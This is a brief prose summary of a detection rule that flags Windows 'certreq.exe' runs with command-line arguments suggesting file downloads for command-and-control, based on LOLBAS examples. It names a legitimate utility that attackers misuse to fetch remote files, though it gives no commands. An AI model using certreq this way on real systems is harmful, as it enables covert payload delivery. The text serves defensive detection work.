This detection rule aims to identify potentially malicious use of the 'certreq' command in Windows systems, particularly in scenarios where this legitimate tool is exploited to facilitate command and control (C2) activities by downloading files from the internet. The rule is based on examples provided by the LOLBAS (Living Off the Land Binaries and Scripts) project, which showcases how commonbuilt-in Windows utilities can be misused by attackers. The detection focuses on process creation events that include specific indicators, namely the execution of 'certreq.exe' and command-line arguments that suggest network activity to fetch external resources. The criteria for alerting include monitoring for the presence of certain strings in the command line that are indicative of these potentially harmful operations. The rule classifies any detection of such behavior as high-risk, considering the potential impact of downloading files through a trusted command. This detection can help security teams to quickly respond to potential threats by investigating the source and intent of the command execution.